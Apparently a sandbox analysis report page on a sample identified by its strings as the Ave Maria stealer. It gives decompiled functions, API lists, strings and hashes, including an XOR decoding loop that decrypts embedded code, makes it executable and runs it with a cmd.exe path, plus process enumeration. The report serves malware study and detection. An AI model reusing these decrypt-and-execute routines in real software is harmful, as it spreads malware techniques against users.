					_t16 =  *_t16(E00410B2A,  &_v44, 0x1c);
					_t34 = _v40;
					_t47 = _t34;
					if(_t34 != 0) {
						L004107C4(_t34, _t47);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t34);
						_v12 = 0;
						E00410BD9( &_v16, _t47, E004035E5( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
						L00405EA5(_v8);
						_v8 = 0;
						L00405EA5(0);
						_push(0);
						_v12 = 0;
						E00410BD9( &_v16, _t47, E004035E5( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
						L00405EA5(_v8);
						_v8 = 0;
						return L00405EA5(0);
					}
				}
				return _t16;
			}

0x00410b2a
0x00410b31
0x00410b36
0x00410b3e
0x00410b46
0x00410b57
0x00410b59
0x00410b5c
0x00410b5e
0x00410b60
0x00410b70
0x00410b76
0x00410b7a
0x00410b8f
0x00410b97
0x00410b9e
0x00410ba1
0x00410ba6
0x00410baa
0x00410bbf
0x00410bc7
0x00410bce
0x00000000
0x00410bd1
0x00410b5e
0x00410bd8

APIs

Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2

MessageBoxA.USER32 ref: 00410B70

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00410BD9: CreateProcessW.KERNEL32 ref: 00410C14

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Strings

C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 00410BAE
VirtualQuery, xrefs: 00410B37
Bla2, xrefs: 00410B67, 00410B6D, 00410B6E
Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 00410B7E

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CreateDispatcherExceptionFreeMessageProcessUserVirtuallstrcmp
String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
API String ID: 2449179951-2308542105
Opcode ID: 7ba3529ddd473e8fbc53ce5e4a3df962d45a9247dbdbb923bf3c86c4c0ac7b9b
Instruction ID: 4ba3c5a06052b2c8142ea2b85e7c1df050322749d38e1d50acf48aea32407323
Opcode Fuzzy Hash: 7ba3529ddd473e8fbc53ce5e4a3df962d45a9247dbdbb923bf3c86c4c0ac7b9b
Instruction Fuzzy Hash: 48111271904118BADB08EBA1DD56CEFBB7CDE44718B10016FB402B2181DB78AF84C668

Uniqueness

Uniqueness Score: -1.00%

Function 00411936, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00411936(void* __ecx) {
				long _v8;
				void* _t7;
				void* _t17;
				void* _t24;
				void* _t26;
				WCHAR* _t31;

				_push(__ecx);
				_t17 = __ecx;
				_t26 = E00401085(0x800);
				_t24 = _t26;
				_t7 = 0x601;
				do {
					 *_t24 =  *(0x416070 + _t24) ^ 0x00000045;
					_t24 = _t24 + 1;
					_t7 = _t7 - 1;
				} while (_t7 != 0);
				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
				GetWindowsDirectoryW(_t31, 0x104);
				E0040102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
				_t5 = _t26 + 0xef; // 0xef
				return  *_t5(_t31, _t17, 0, 0);
			}

0x00411939
0x00411942
0x00411949
0x00411951
0x00411955
0x0041195a
0x00411960
0x00411962
0x00411963
0x00411963
0x00411974
0x0041198e
0x00411996
0x004119ae
0x004119b6
0x004119c8

APIs

Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092

VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000), ref: 00411974
VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411988
GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411996
lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 004119A4

Strings

\System32\cmd.exe, xrefs: 0041199E

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 2244922440-2003734499
Opcode ID: b35bf8d72498e572ccce794c73ad00c33004e6f459524028fc2f66513e749da9
Instruction ID: a76fe1fb72b9dcd2ba7f7b2c9fe6201737636b2b93b56a950f172e3949bf7431
Opcode Fuzzy Hash: b35bf8d72498e572ccce794c73ad00c33004e6f459524028fc2f66513e749da9
Instruction Fuzzy Hash: 4A0124712803507BE22057659C0AFEB2BA88B89B41F104035F749BA1D0C9A8A880839C

Uniqueness

Uniqueness Score: -1.00%

Function 04697FD0, Relevance: 7.6, APIs: 5, Instructions: 82filesleepCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(0470EAE8), ref: 0469801B
CloseHandle.KERNEL32(00000000), ref: 04698028
CloseHandle.KERNEL32(?), ref: 0469803C
Sleep.KERNEL32(00000064), ref: 0469804A
CloseHandle.KERNEL32(?), ref: 04698054

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: CloseHandle$FileSleepUnmapView
String ID:
API String ID: 888976869-0
Opcode ID: 79ff5ff5f39bad72464ee76a5359f7319f0b0fc522b7701997777402ac7780fb
Instruction ID: 49263e130aebebc129a45eb60405e409309cf72a8ee204c9fb3a302dfcc394b9
Opcode Fuzzy Hash: 79ff5ff5f39bad72464ee76a5359f7319f0b0fc522b7701997777402ac7780fb
Instruction Fuzzy Hash: 69216B75A11700EBDB34EF68D940A6A73ECFB85714B048A1CE94597740EBB5FD418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 046996B0, Relevance: 7.6, APIs: 5, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 046996E9

Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,0469908D,00000000,00000000,74E5F560), ref: 04697770
Part of subcall function 04697760: _malloc.LIBCMT ref: 0469777C
Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04697796
Part of subcall function 04697760: _free.LIBCMT ref: 046977A1

GetVersionExW.KERNEL32(?), ref: 0469973F
LoadLibraryW.KERNEL32(00000000), ref: 04699759
LoadLibraryA.KERNEL32(00000000), ref: 04699761
_free.LIBCMT ref: 0469976A

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharLibraryLoadMultiVersionWide_free$_malloc
String ID:
API String ID: 878107876-0
Opcode ID: e7fe6b0a6e036670d64a42cac45f6b0eed8cd685a03e7df398f227dbe0f65a85
Instruction ID: f6944857c91a1f42f3b6cbd98a67c40663121713cdce59fac8490212aaee07d9
Opcode Fuzzy Hash: e7fe6b0a6e036670d64a42cac45f6b0eed8cd685a03e7df398f227dbe0f65a85
Instruction Fuzzy Hash: 3F218472A01118DBDB20EF75A8456EEB3E8EB48329F1084ADD509C7240EE74AD45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 046978D0, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 046978F8
GetLastError.KERNEL32 ref: 04697909
GetLastError.KERNEL32 ref: 0469790F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0469792C
GetLastError.KERNEL32 ref: 04697952

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ErrorLast$File$PointerWrite
String ID:
API String ID: 3440492293-0
Opcode ID: ffdeac8412b983ac213da6de038cd55d3e5b8280db3211789e20023ce4091c65
Instruction ID: b57bc354a748f13205fb459d223858ca04d3136f51f50f3cb5f1d27c76372fe4
Opcode Fuzzy Hash: ffdeac8412b983ac213da6de038cd55d3e5b8280db3211789e20023ce4091c65
Instruction Fuzzy Hash: 89117F32611219EBDF20CE69EC44BDA77ECEB44665B144658FD28DB380EA74ED408BE0

Uniqueness

Uniqueness Score: -1.00%

Function 04697980, Relevance: 7.6, APIs: 5, Instructions: 70fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 046979AB
SetFilePointer.KERNEL32(?,?,?,00000000), ref: 046979DC
GetLastError.KERNEL32 ref: 046979ED
GetLastError.KERNEL32 ref: 046979F3
SetEndOfFile.KERNEL32(?), ref: 04697A08

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ErrorFileLast$PointerUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1588551569-0
Opcode ID: 55ac7979bd30c5b3799c684abd99f6ed795a9a7ec5e5ac2ef056ac80df4b7be6
Instruction ID: 4a15a67518d4b82c3552e672b0bfdbd378c90f55c3164eca4dd38110197b7a2f
Opcode Fuzzy Hash: 55ac7979bd30c5b3799c684abd99f6ed795a9a7ec5e5ac2ef056ac80df4b7be6
Instruction Fuzzy Hash: 391182766102059BDF14CE69DC84EAB779DFB85235B088B69FD69C7380EA74EC0086B0

Uniqueness

Uniqueness Score: -1.00%

Function 046F6757, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 046F6765

Part of subcall function 046F643B: __FF_MSGBANNER.LIBCMT ref: 046F6454
Part of subcall function 046F643B: __NMSG_WRITE.LIBCMT ref: 046F645B
Part of subcall function 046F643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6480

_free.LIBCMT ref: 046F6778

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: b34de3189e0a216b37cbe086696f7e6a3027a30b82f370a0d8debf392de9d084
Instruction ID: bc5fcdba9deb6902fb5382520aa28e8e298a5d8ef25ecfd9ed79f69e748d04cb
Opcode Fuzzy Hash: b34de3189e0a216b37cbe086696f7e6a3027a30b82f370a0d8debf392de9d084
Instruction Fuzzy Hash: C611E732505A15EBDB213F74EC04B993B95EF50278B208429FBD99B250FE35B8438754

Uniqueness

Uniqueness Score: -1.00%

Function 046976F0, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 046976F6
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 04697712
_malloc.LIBCMT ref: 0469771B

Part of subcall function 046F643B: __FF_MSGBANNER.LIBCMT ref: 046F6454
Part of subcall function 046F643B: __NMSG_WRITE.LIBCMT ref: 046F645B
Part of subcall function 046F643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6480

WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0469773D
_free.LIBCMT ref: 04697748

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
String ID:
API String ID: 2559239037-0
Opcode ID: 6b04f2e6d062507708be8c0a5bbbba915108c48de409bde36029191563f91473
Instruction ID: df76e9eaf920a12b8497006ca8db7c5a83a1df34bde48184be646aed1c8b5d5f
Opcode Fuzzy Hash: 6b04f2e6d062507708be8c0a5bbbba915108c48de409bde36029191563f91473
Instruction Fuzzy Hash: 59F0FC723412147BF6105655BC46FBB375CDBC1AB9F204225FB19DA2C0E9E56C0241A5

Uniqueness

Uniqueness Score: -1.00%

Function 04697680, Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 04697686
MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 0469769E
_malloc.LIBCMT ref: 046976AC

Part of subcall function 046F643B: __FF_MSGBANNER.LIBCMT ref: 046F6454
Part of subcall function 046F643B: __NMSG_WRITE.LIBCMT ref: 046F645B
Part of subcall function 046F643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6480

MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 046976CA
_free.LIBCMT ref: 046976D5

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
String ID:
API String ID: 2559239037-0
Opcode ID: 5db2d43db6f33b6db36a7d39570da78c135c5f00511100ccd1691138ea0c4ad7
Instruction ID: 94986b0db8e0978d301f0b5a4dcd7eb020900b22a6385629aa4567251f676c31
Opcode Fuzzy Hash: 5db2d43db6f33b6db36a7d39570da78c135c5f00511100ccd1691138ea0c4ad7
Instruction Fuzzy Hash: 27F042723052147BF71069ACBC84FFB379CEB81579F100335FB19822C0F9659C0241A0

Uniqueness

Uniqueness Score: -1.00%

Function 00410C79, Relevance: 7.5, APIs: 5, Instructions: 44
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410C79(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t8;
				void* _t14;
				void* _t18;
				signed int* _t19;

				_t14 = __edx;
				_v560 = 0x22c;
				_t19 = __ecx;
				_t18 = CreateToolhelp32Snapshot(2, 0);
				if(_t18 == 0xffffffff) {
					L6:
					 *_t19 =  *_t19 & 0x00000000;
				} else {
					_t8 =  &_v560;
					Process32FirstW(_t18, _t8);
					while(_t8 != 0) {
						if(_v552 == _t14) {
							CloseHandle(_t18);
							E004035E5(_t19,  &_v524);
						} else {
							_t8 = Process32NextW(_t18,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t18);
					goto L6;
				}
				L7:
				return _t19;
			}

0x00410c89
0x00410c8b
0x00410c95
0x00410c9d
0x00410ca2
0x00410cd5
0x00410cd5
0x00410ca4
0x00410ca4
0x00410cac
0x00410cca
0x00410cba
0x00410ce0
0x00410cef
0x00410cbc
0x00410cc4
0x00000000
0x00410cc4
0x00000000
0x00410cba
0x00410ccf
0x00000000
0x00410ccf
0x00410cd9
0x00410cde

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410C97
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00410CAC
Process32NextW.KERNEL32(00000000,0000022C), ref: 00410CC4
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00410CCF
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00410CE0

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: dbb6d2a3e1f78c4e63f1433d229d8ec0479cf8ed85dc0024f1e2f21a347d4ae9
Instruction ID: 2e00dfdaa672dd9684fc02a2f22ff91a15fe0b01dd777914ba71400be5e2cff0
Opcode Fuzzy Hash: dbb6d2a3e1f78c4e63f1433d229d8ec0479cf8ed85dc0024f1e2f21a347d4ae9
Instruction Fuzzy Hash: 0B01D631200214BBD7245BF5EC4CBFF7ABCAB84765F104166F50592290E7B88CC19F99

Uniqueness

Uniqueness Score: -1.00%

Function 04697760, Relevance: 7.5, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,0469908D,00000000,00000000,74E5F560), ref: 04697770
_malloc.LIBCMT ref: 0469777C

Part of subcall function 046F643B: __FF_MSGBANNER.LIBCMT ref: 046F6454
Part of subcall function 046F643B: __NMSG_WRITE.LIBCMT ref: 046F645B
Part of subcall function 046F643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6480

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04697796
_free.LIBCMT ref: 046977A1

Part of subcall function 046F6401: HeapFree.KERNEL32(00000000,00000000,?,046F8196,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257), ref: 046F6417
Part of subcall function 046F6401: GetLastError.KERNEL32(00000000,?,046F8196,00000000,?,046F84E8,00000008,00000001,00000008,?,046F91C7,00000018,04709530,0000000C,046F9257,00000008), ref: 046F6429

_free.LIBCMT ref: 046977B6

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharHeapMultiWide_free$AllocateErrorFreeLast_malloc
String ID:
API String ID: 70952271-0
Opcode ID: 49e63843147cf689b28f45f091f8b7af107b142ea9901c3146a0c899f1925e1e
Instruction ID: 7b3125151d9c4f1e8aef8c72de04ffdd688b037595314dd6d6a3f109646a886a
Opcode Fuzzy Hash: 49e63843147cf689b28f45f091f8b7af107b142ea9901c3146a0c899f1925e1e
Instruction Fuzzy Hash: BEF08972A4522276F72035B57C0AFA7258C8B91A75F250731FA14DA2C4FD94AC4245B5

Uniqueness

Uniqueness Score: -1.00%

Function 046FA19E, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 046FA1AA

Part of subcall function 046F81A5: __getptd_noexit.LIBCMT ref: 046F81A8
Part of subcall function 046F81A5: __amsg_exit.LIBCMT ref: 046F81B5

__getptd.LIBCMT ref: 046FA1C1
__amsg_exit.LIBCMT ref: 046FA1CF
__lock.LIBCMT ref: 046FA1DF
__updatetlocinfoEx_nolock.LIBCMT ref: 046FA1F3

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 1136d8b1d6b5bc44a8183c455b8bfdf90fe69f42a0429d07adceb123eb33ac34
Instruction ID: 507f8af7b06ae6b92fdc1aa5db6358e4157ddf0397f40a85eb957a971c11277c
Opcode Fuzzy Hash: 1136d8b1d6b5bc44a8183c455b8bfdf90fe69f42a0429d07adceb123eb33ac34
Instruction Fuzzy Hash: CBF06D72A066049AF621FBF8AC05B8933A0AF00728F12424DEA89672C1FF247945DA59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9A9, Relevance: 7.5, APIs: 5, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B9A9(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}

0x0040b9b2
0x0040b9ba
0x0040b9c4
0x0040b9ca
0x0040b9d2
0x0040b9d8
0x0040b9e0
0x0040b9e6
0x0040b9ee
0x0040b9f4
0x0040b9f6
0x0040b9ff

APIs

FreeLibrary.KERNEL32(?,00000001,?,00000000,0040B132,?,00000000), ref: 0040B9BA
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040B9CA
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040B9D8
FreeLibrary.KERNEL32(0000000A,?,00000000), ref: 0040B9E6
FreeLibrary.KERNEL32(?,?,00000000), ref: 0040B9F4

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
Instruction ID: de1b090c5ecee71095dd0539afea7425d556fea4fcc2e68f80fdcb856166325a
Opcode Fuzzy Hash: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
Instruction Fuzzy Hash: BCF0AEB1B00B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 0040B627, Relevance: 7.5, APIs: 5, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B627(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}

0x0040b630
0x0040b638
0x0040b642
0x0040b648
0x0040b650
0x0040b656
0x0040b65e
0x0040b664
0x0040b66c
0x0040b672
0x0040b674
0x0040b67d

APIs

FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF,?,00000000), ref: 0040B638
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040B648
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040B656
FreeLibrary.KERNEL32(0000000A,?,00000000), ref: 0040B664
FreeLibrary.KERNEL32(?,?,00000000), ref: 0040B672

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
Instruction ID: de1b090c5ecee71095dd0539afea7425d556fea4fcc2e68f80fdcb856166325a
Opcode Fuzzy Hash: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
Instruction Fuzzy Hash: BCF0AEB1B00B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 046A0860, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A08BE

Strings

, xrefs: 046A0A90
Recovered %d frames from WAL file %s, xrefs: 046A0BEE
, xrefs: 046A08F1

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: $ $Recovered %d frames from WAL file %s
API String ID: 2102423945-1630138656
Opcode ID: 45d5ceadbc87284d78bb98bb524ffc15c2344f2965a98476156827340ae2ec60
Instruction ID: 711beb5ee005763c2fef073185f3e52f6cc82bd6aacae2fd55aa5bffe5354b51
Opcode Fuzzy Hash: 45d5ceadbc87284d78bb98bb524ffc15c2344f2965a98476156827340ae2ec60
Instruction Fuzzy Hash: 8AB19A71A087019FD714CF28C880A2BBBE5AF99304F04496DE995CB352E771EE59CF92

Uniqueness

Uniqueness Score: -1.00%

Function 046A6BF0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A6E0D

Part of subcall function 0469D4E0: _memset.LIBCMT ref: 0469D514

Strings

e, xrefs: 046A6CAD
database corruption at line %d of [%.10s], xrefs: 046A6CD1, 046A6E24
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A6CC7, 046A6E1A

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$e$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1498164319
Opcode ID: f5bd9e41f766b4b10c9b9b99751b1e273b7b7657df113eb212921acad84038a0
Instruction ID: c7ad47bb50c8b7f826d15e271a11c876ec609248c055d27dac4f3ef1809a5804
Opcode Fuzzy Hash: f5bd9e41f766b4b10c9b9b99751b1e273b7b7657df113eb212921acad84038a0
Instruction Fuzzy Hash: 2581ADB16046018FCB24CF28C480A5AB7E1EB94714F18896EE99A9B381F671FD65CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA42, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040FA42() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}

0x0040fa50
0x0040fa5a
0x0040fa62
0x0040fa81
0x0040fa83
0x0040fa8a
0x00000000
0x0040fa90
0x0040fa90
0x0040fa95
0x0040fb54
0x0040fb65
0x0040fb95
0x0040fbe2
0x00000000
0x0040fbed
0x0040fbf7
0x0040fbf7
0x0040fb97
0x0040fb97
0x0040fb9f
0x0040fbaf
0x0040fbbe
0x0040fbce
0x00000000
0x0040fbd0
0x0040fbda
0x0040fbda
0x0040fbc0
0x0040fbca
0x0040fbca
0x0040fbb1
